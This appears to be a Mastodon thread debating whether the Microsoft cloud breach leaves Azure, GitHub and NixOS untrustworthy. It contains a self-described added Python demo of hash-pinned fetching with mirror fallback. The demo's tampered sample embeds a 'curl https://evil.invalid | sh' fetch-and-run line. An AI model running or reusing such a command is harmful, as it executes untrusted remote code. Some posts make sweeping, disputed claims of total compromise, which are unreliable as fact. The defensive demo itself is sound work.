publicvoit,
@publicvoit@graz.social avatar

After basically the whole cloud was hacked (see the list of related sources on https://karl-voit.at/cloud/ ), the first follow-up incidents, caused by missing containment actions, went public:

60,000 emails were stolen from 10 accounts
https://www.reuters.com/world/us/chinese-hackers-stole-60000-emails-us-state-department-microsoft-hack-senate-2023-09-27/

If you didn't understand until now: basically EVERYTHING at Microsoft got hacked and Microsoft can't (or won't) get rid of the intruders. Everything authenticated by Microsoft is tainted. Even auth.

publicvoit,
@publicvoit@graz.social avatar

If #Microsoft has any (internal) trust relation between the hacked #Azure certificates and #GitHub, we need to consider GitHub as hacked/tainted.

gegs,

@publicvoit something I've argued for many years now: cloud providers are a much bigger target than any individual company, so they are a) bound to be infiltrated by nation states and their "subsidiaries" and b) it will be nearly impossible to purge such actors completely from cloud systems because the scope will be global. Still, financial and other high-risk institutions insist that cloud is better than owning and managing their own hardware. Like with AGW, people pay attention too late.

jonsnow,
@jonsnow@mastodon.online avatar

@gegs @publicvoit There's no such thing as "cloud", it's just someone else's computer 🤷

Here's a relevant cloud ad from a game released exactly a decade ago https://www.youtube.com/watch?v=9GP0KDuzgBc

gegs,

@jonsnow @publicvoit this has been a mantra of security experts since "cloud" became a thing. The earliest reference I can find is 10 years old: https://grahamcluley.com/cloud-someone-elses-computer/
The problem with that (now a meme) is that it doesn't convey the enormous risk it poses to those making the decision on where to run a workload, in a world run by people who have been taught that IT isn't core business. Instead of being a smaller risk of a hack, it actually became a near 100% risk of a hack.

publicvoit,
@publicvoit@graz.social avatar

@gegs @jonsnow Thanks for the reference. Added to my knowledge base!

timbray,
@timbray@cosocial.ca avatar

@gegs @publicvoit The first time I heard a super senior public-cloud security leader say "our assumptions have to include that at least one of our employees has more than one employer" was like 7 years ago. It's part of the conventional threat model these days. What makes you think that banks would be better at countering that particular threat than GCP or AWS?

timbray,
@timbray@cosocial.ca avatar

@gegs @publicvoit Why, yes, I did leave Microsoft out of that question.

gegs,

@timbray @publicvoit I've "not been a fan" of Microsoft since the early '90s, but Azure is no better or worse than other big cloud providers, so I don't see a reason to single them out in this case, but please elaborate.

gegs,

@timbray @publicvoit the question is quite precisely: what types of infrastructure have which associated risk. A cloud environment, when compromised, affects all its tenants at once. If you don't understand the implications, look up the history of the Gros Michel banana variety.

TheSauce,

@publicvoit

I hope your blog post gets the audience it deserves. A truly shocking litany of cloud disaster.

https://karl-voit.at/cloud/

publicvoit,
@publicvoit@graz.social avatar

@TheSauce Thanks. Help me spread the word.

There are too many business decisions pro-cloud that don't respect the full spectrum of risks.

E.g., investing in my own admins and their knowledge is worth nothing as it seems.

TheSauce,

@publicvoit

I keep thinking about all of the cloud "glitter" that gets tossed around as a distraction from the creaking monstrosity that lies behind the sales pitch.

Don't worry, your post is most certainly getting attention in my neck of the woods.

publicvoit,
@publicvoit@graz.social avatar

Now that I have migrated some of my hosts to #NixOS, I do have a bad feeling because of #Microsoft and most probably GitHub being hacked.

As mentioned on https://www.karl-voit.at/2023/09/12/nix/ the deep #GitHub dependency turns out to be a real downer for this OS.

#security #integrity

davidoclubb,
@davidoclubb@toot.wales avatar

@publicvoit I hear so many positive things about this on various podcasts (you probably know the ones), but I once tried it and couldn't even get to a usable desktop environment. That was a while back, but I will stick with other OSs for now; and maybe if I go immutable I will try #Fedora first

raito,
@raito@nixos.paris avatar

@publicvoit While I agree with you that there are issues, I worry that your framing is flirting with baseless conspiracies, as you seem to be ignoring that there are many safeguards in place to avoid letting GitHub corrupt the whole project.

Even if we didn't use GitHub, you have to understand that NixOS / Nixpkgs cannot force anyone whose packages we consume to migrate somewhere else.

In either case, I think this is kinda FUD…

publicvoit,
@publicvoit@graz.social avatar

@raito I can't follow your accusation.

The facts show that Microsoft has been compromised since at least 2021-04.

There is no claim by MS I know of that GH is completely separated from MS infrastructure that got compromised.

Current NixOS setups are pulling from GitHub which belongs to Microsoft. Yes, this can be changed but that's not the point here at all.

As far as I know, you can't protect yourself from a bad actor that has more or less full access to the GH infrastructure and backends.
1/2

raito,
@raito@nixos.paris avatar

@publicvoit

You are jumping from "MSFT got compromised at time T" to "MSFT is still compromised and all GH repos are compromised with full capabilities for attackers". This is one of my accusations.

> As far as I know, you can't protect yourself from a bad actor that has more or less full access to the GH infrastructure and backends.

Assuming this without proof is, to be honest, conspiracy.
I don't like Microsoft either, but this is ridiculous.

publicvoit,
@publicvoit@graz.social avatar

@raito The bad actors had years of more or less full access to MS infrastructure.

Actors that can pull off such an attack are perfectly well aware of what to do so that they keep access when the original attack vector is not available any more.

This is standard procedure for each intrusion attack.

Furthermore, in such a situation, the original bad actors can provide any sort of access to interested parties.

Yes, it's hard to digest but that's absolutely standard IT sec reasoning.

publicvoit,
@publicvoit@graz.social avatar

@raito Furthermore, it's not just me who tries to explain the implications. Please read other sources that quote various security experts and how they judge the impact of this incident.

Assuming that nothing happened to GH is understandable from a project's point of view (effort! trust!) but nothing more than wishful thinking without any proof.

In IT sec, you always(!) assume the worst case just because of that. You can never be sure otherwise.

lispi314,

@publicvoit @raito Does NixOS not independently sign its updates and use checksums of the aggregate repo contents (not trusting git's mostly sha1-only setup) like Guix?

If it does those two things, there's very little a malicious host could do other than denial of service.

If it doesn't then uh yeah, it's broken and really should fix that post haste.

publicvoit,
@publicvoit@graz.social avatar

@raito 2/2

Yes, there is no proof or indication that anything happened to any GH repository yet. 👍

However, in IT security, you don't rely on a lucky guess. A compromised network is still a compromised network and needs to be restarted from a clean state.

It doesn't look like MS is going to set up major parts of their infrastructure again to introduce trustworthy hosts.

So where's the FUD in terms of reasoning?

raito,
@raito@nixos.paris avatar

@publicvoit

> So where's the FUD in terms of reasoning?

> It doesn't look like MS is going to setup major parts of their infrastructure to introduce trustworthy hosts again.

I think you answered yourself very well.

In IT security, lucky guesses are not primitives to build threat models. Hypotheses, assumptions, economics, politics, technical measures and careful analyses are.

What you are doing is just lucky guessing that MSFT didn't do any form of "reasonable" due diligence.

publicvoit,
@publicvoit@graz.social avatar

@raito After years of having a (potential) state actor in the back-end of MS, I'd be very interested in your assumptions that they really did not perform lateral movement and expand to linked networks.

No tech measures can mitigate or contain such an attack that lasted for so long in retrospect.

From a political/economic perspective, we agree. We see what the economic decisions were already.

But that is strongly orthogonal to IT sec reasoning. Trade-offs won, as usual. But no proof.

raito,
@raito@nixos.paris avatar

@publicvoit But then, assuming the level of catastrophe you are describing.

What value is there in using a modern computer? NixOS/Nix is not the only thing affected. systemd is in GitHub, systemd developers are from Microsoft, etc, etc.

What is the usable advice we can get out of your whistleblowing?

publicvoit,
@publicvoit@graz.social avatar

@raito I'm not a whistleblower at all! I just quoted articles published by MS & independent sources.

I never said that we should stop using NixOS, systemd, ...

We just need to be aware that there is no such thing as a trustworthy cloud infrastructure, most probably anywhere, unless you deal with it yourself to some degree.

All projects that rely on a potentially compromised infrastructure need to invest in mitigation measures against malicious infrastructure, which wasn't discussed so far AFAIK.

raito,
@raito@nixos.paris avatar

@publicvoit

> I never said that we should stop using NixOS, systemd, ...

> We just need to be aware that there is no such thing as a trustworthy cloud infrastructure most probably anywhere except you deal with it yourself to some degree.

Right, but what you are saying is that NixOS is particularly reliant on GitHub whereas everyone is reliant on GitHub so…

raito,
@raito@nixos.paris avatar

@publicvoit

> All projects that rely on a potentially compromised infrastructure need to invest in mitigation measures against malicious infrastructure, which wasn't discussed so far AFAIK.

We already touched base on some obvious mitigation measures we all enjoy thanks to the concept of Git repositories.

We have many more because of how nixpkgs works, but I admit I am slightly annoyed because you seem to be ignoring them, and you didn't contact any subject-matter expert, I assume?

lispi314,

@publicvoit It doesn't have anything like Guix's fallbacks to (among other things) the #SoftwareHeritage archive?

That's all kinds of unfortunate.
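The property lispi314 asks about in the two posts above (independent verification of what was fetched, plus a fallback to another host such as an archive), as an added example that is not part of this thread and not code from Nix, Guix or Software Heritage: the consumer pins a SHA-256 digest of the artifact itself in its own lockfile, so whichever host serves the bytes is untrusted, and a compromised forge can at most deny service. Mirrors are tried in order until one returns bytes matching the pin. The lockfile entry, the sample tarballs and the three mirrors are all constructed here for illustration; `git_blob_sha1` is included only to show that a git object id is a SHA-1 over git's own framing, which is why the pin is taken over the downloaded content instead.

```python
"""Content-addressed fetching with mirror fallback (added illustration)."""
import hashlib
import hmac
from typing import Callable, List, Optional, Tuple

# Constructed sample payloads standing in for a source tarball.
GOOD_TARBALL = b"package-1.0 sources (constructed sample)\n"
TAMPERED_TARBALL = GOOD_TARBALL + b"curl https://evil.invalid | sh\n"


def sha256_hex(data: bytes) -> str:
    """Digest the artifact as downloaded; this is what the lockfile pins."""
    return hashlib.sha256(data).hexdigest()


def git_blob_sha1(data: bytes) -> str:
    """Git's object id for a blob: SHA-1 over 'blob <len>\\0' + content.
    Only here to show that a commit or blob id is not a digest of the
    tarball a consumer actually downloads."""
    return hashlib.sha1(b"blob %d\0" % len(data) + data).hexdigest()


# Hypothetical lockfile entry: recorded once, reviewed, kept by the
# consumer, and never read back from the host being fetched from.
LOCK = {"name": "package-1.0.tar.gz", "sha256": sha256_hex(GOOD_TARBALL)}

# A mirror is a label plus a callable returning the bytes it holds for
# a name, or None if it does not carry that artifact.
Mirror = Tuple[str, Callable[[str], Optional[bytes]]]


class FetchError(Exception):
    """Raised only when no mirror produced bytes matching the pin."""


def fetch_verified(name: str, expected_sha256: str,
                   mirrors: List[Mirror]) -> Tuple[str, bytes]:
    """Return (mirror_label, data) from the first mirror whose payload
    matches the pinned digest; every other outcome is recorded and skipped."""
    failures = []
    for label, fetch in mirrors:
        data = fetch(name)
        if data is None:
            failures.append(f"{label}: no such artifact")
            continue
        got = sha256_hex(data)
        if hmac.compare_digest(got, expected_sha256):
            return label, data
        # A mismatch is treated exactly like a missing artifact: the
        # bytes are dropped, not "used for now".
        failures.append(f"{label}: hash mismatch (got {got[:16]})")
    raise FetchError("; ".join(failures))


# Three constructed mirrors: a forge whose backend now serves a
# backdoored tarball, a mirror that never carried the package, and an
# archive that still holds the original.
def compromised_forge(name: str) -> Optional[bytes]:
    return TAMPERED_TARBALL if name == LOCK["name"] else None


def empty_mirror(name: str) -> Optional[bytes]:
    return None


def software_archive(name: str) -> Optional[bytes]:
    return GOOD_TARBALL if name == LOCK["name"] else None


MIRRORS: List[Mirror] = [
    ("forge", compromised_forge),
    ("empty", empty_mirror),
    ("archive", software_archive),
]


def main() -> None:
    label, data = fetch_verified(LOCK["name"], LOCK["sha256"], MIRRORS)
    print(f"served by {label}: {len(data)} bytes, sha256 {sha256_hex(data)}")
    print(f"git blob id of the same bytes: {git_blob_sha1(data)}")
    try:
        fetch_verified(LOCK["name"], LOCK["sha256"], MIRRORS[:1])
    except FetchError as e:
        print(f"forge alone: refused ({e})")


if __name__ == "__main__":
    main()
```

The check that matters is the order of trust: the digest comes from the consumer's lockfile, the bytes come from whoever answers, and nothing a host can say (a different tag, a rewritten commit, a replaced release asset) changes the verdict. What this does not cover is the first pin: whoever records the digest initially has to obtain the artifact from a source they trust, which is where signed releases or a second independent host come in.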

ctietze,
@ctietze@mastodon.social avatar

@publicvoit I love that you're keeping such a long historic list!

Reminds me of @mjtsai's Review Rejections at https://mjtsai.com/blog/tag/rejection/ or https://web3isgoinggreat.com/ :)

(It's also horrible that the list could become so long.)

publicvoit,
@publicvoit@graz.social avatar

@ctietze @mjtsai Thank you for the links, I've added a section at the bottom of my cloud page to link to similar lists. 👍

mayuraviva,
@mayuraviva@shelter.moe avatar

@publicvoit Offline and local apps are still preferable even in 2023.

zazzoo,

@publicvoit The mass uptake of Microsoft's mail services has always rung alarm bells for me. Azure, particularly their 365 suite platform is too rich a target not to be hacked. Also, Azure is a late-comer. I've always felt it was a panicked rush to market.

When asked, I have always advised people to stay clear of any of it.

MrManor,

@publicvoit
And still leadership and several colleagues at one of the Danish Regional Hospital services insist on having office data and mail in MS cloud services. But of course no patient data will leak over... 🙄

AngelaScholder,
@AngelaScholder@mastodon.energy avatar

@publicvoit One reason why I think it's unacceptable for our government and other authorities to use Azure or AWS services.

We used to have the KeePass database stored in webspace with our ISP (until KPN assimilated them).
It's now on a NAS, as is all our data, but securely backed up in the cloud (one in NL, one in Germany).
The cloud storage is used for sharing things, and thus as off-site backup (encrypted) for important data.

It's bad enough that basically for a mobile, the only real >2

publicvoit,
@publicvoit@graz.social avatar

@AngelaScholder You could think of using Syncthing as it doesn't require external cloud hosts.

AngelaScholder,
@AngelaScholder@mastodon.energy avatar

@publicvoit All our own internal syncing is done via the NAS systems. So the personal data is synchronised between the desktop, netbook, and Ubuntu laptop.

The netbooks and Ubuntu laptop have a synchronised copy of the KeePass database. This to prevent an issue if our home connection would be offline if we are away.

malg,

@publicvoit there are alternatives to GitHub - https://codeberg.org/ for example, or self-host https://about.gitea.com/

StevenBarnhart,

@publicvoit @matthew_d_green I don’t get how you jump to that conclusion based on the facts presented.

publicvoit,
@publicvoit@graz.social avatar

@StevenBarnhart @matthew_d_green If I was not able to explain it in that short Mastodon message, read the related parts on my blog article https://karl-voit.at/cloud/ and follow the independent sources listed there.

It's not that this is just my personal reasoning. Not at all.

StevenBarnhart,

@publicvoit @matthew_d_green “On July 3, Microsoft blocked usage of the key for all impacted consumer customers to prevent use of previously-issued tokens.”

publicvoit,
@publicvoit@graz.social avatar

@StevenBarnhart @matthew_d_green Years of access to the inner workings of Microsoft by a presumed state actor and you think that they did not think of creating their own certificates or even implant backdoors? 🤔

purusov,
@purusov@mastodon.social avatar

@publicvoit combine this with implications outlined in Ken Thompson’s “Reflections on trusting trust”, and the whole thing looks absolutely terrifying

jrballesteros05,

@publicvoit I haven't had any microshit account, but I changed my job and now I have the job account there. I know I don't have anything personal there, but I don't know what kind of personal data of the company I work for is there. I have always been very sceptical about moving everything to the fucking cloud and I have always been very critical about that.

Something I hate most is people who don't have any fucking idea about anything telling us that we should move everything there.

publicvoit,
@publicvoit@graz.social avatar

@jrballesteros05 It's not just services by Microsoft. It's the whole Azure and all of its customers we have no idea of. Including GitHub.

blausand,
@blausand@chaos.social avatar

@publicvoit
A.N.Y F.U.R.T.H.E.R Q.U.E.S.T.I.O.N.S ?

synlogic,
@synlogic@toot.io avatar

@publicvoit good chance the decision to host State Dept emails on MS cloud was made during the Trump admin. No specific knowledge of that, but a smart way to bet. The man is a Russian traitor trying to sabotage the US every way he can get away with.

fedops,
@fedops@fosstodon.org avatar

@publicvoit comments from our security and IT manglement: "we weren't affected, msft said so."

I'd tear my hair out, but honestly...

rowmyboat,
@rowmyboat@glammr.us avatar

@publicvoit wow, love that my R1 university has gone whole hog into Microsoft for the university’s digital infrastructure

tehstu,
@tehstu@hachyderm.io avatar

@publicvoit as a layman, is it safe to assume consumer services are affected (e.g., OneDrive)?

publicvoit,
@publicvoit@graz.social avatar

@tehstu Oh absolutely.

stdevel,
@stdevel@chaos.social avatar

@publicvoit We really need a user-friendly alternative to #GitHub. Love seeing that both @forgejo and #GitLab are working on ActivityPub support. Can't wait to try it out.

batalanto,

I have really been baffled by the widespread loyalty to Microsoft in the #FreeSoftware community. I wonder if you have the answer… is it really user-friendliness that causes FOSS devs to embrace #Github with such strong loyalty as to ignore the marginalization of the people and communities excluded by MS? I think of developers as quite technical, so I would not have thought user-friendliness is that critical to a forge. #askFedi

kikebenlloch,
@kikebenlloch@mastodon.social avatar

@publicvoit Fuck me, I had no idea, the volume of this shitload is unreal.

adiz,

@publicvoit Wow, that really sucks for users of Microsoft products and services. Oh, well! ​:panopticon:​​:gnutroll:​

publicvoit,
@publicvoit@graz.social avatar

@adiz This does not only affect #Microsoft and their direct services.

This also affects all customers of Azure and their services.

You don't know what services you're using whose back-end is hosted in #Azure.

lispi314,

@publicvoit @adiz Services shouldn't really be trusted as far as one can throw them though.

If their computation cannot be (and isn't by default) verified locally, they should be avoided entirely.

coolboymew,

@publicvoit Get on the cloud they said, it's a good idea to have everything in one place they said

yaeunerd,

@publicvoit Could you go a little bit more in depth about:

> Microsoft can't (or won't) get rid of the intruders

P.S. I must admit I didn't read your article on karl-voit.at; was a little bit too long sorry 🙏

publicvoit,
@publicvoit@graz.social avatar

@yaeunerd Sure.

In simple words: #Microsoft lost one of their master keys to unlock very important parts of their cloud. This connects to all MS services that authenticate via MS, which includes most #Windows setups as well.

This happened a long time ago; some people think it was the Chinese.

They were able to implant #backdoors, self-made keys, ... all over the place.

In order to fix that, MS would need to kill all their connected hosts and start from scratch. It's obvious why they don't.
